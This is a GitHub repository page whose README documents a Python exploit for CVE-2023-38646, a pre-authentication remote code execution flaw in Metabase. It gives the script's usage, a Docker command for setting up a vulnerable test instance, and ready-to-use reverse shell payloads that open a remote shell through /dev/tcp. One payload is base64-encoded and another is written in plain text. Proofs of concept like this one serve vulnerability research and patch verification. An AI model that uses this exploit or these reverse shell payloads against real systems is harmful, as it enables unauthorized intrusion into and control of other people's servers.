Skip to content

Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

Notifications You must be signed in to change notification settings

Red4mber/CVE-2023-38646

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

CVE-2023-38646

Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

The script will GET /api/session/properties to get the setup token and assess exploitability of the target. If it's vulnerable will then print the setup token, else it will quit after an error message.

If the -x option is used and the target is vulnerable, it will use the provided payload to attempt to exploit the vulnerability.

More information in this awesome writeup by the team who discovered the vulnerability: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Usage: CVE-2023-38646.py [-h] [-x BASE64 PAYLOAD] url

Metabase Pre-Auth RCE Exploit

positional arguments:
  url                Url of the metabase instance

optional arguments:
  -h, --help         Show this help message and exit
  -x BASE64_PAYLOAD  Exploits the vulnerability

If needed, you can quickly spin up a test environment in a docker container using this command :

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6

After visiting http://127.0.0.1:3000/ to finish the setup, and starting a listener,
You can exploit the RCE with something like this :

python3 ./CVE-2023-38646.py -x c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDQ0MyAwPiYx http://127.0.0.1:3000/

# If you prefer this and use bash (or anything but fish really)
# you should be able to command substitution to encode your payload directly inline like so
python3 ./CVE-2023-38646.py -x $(echo "sh -i >& /dev/tcp/127.0.0.1/4443 0>&1" | base64) http://127.0.0.1:3000/

or just grab your own base64 encoded reverse shell by visiting revshells.com

About

Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages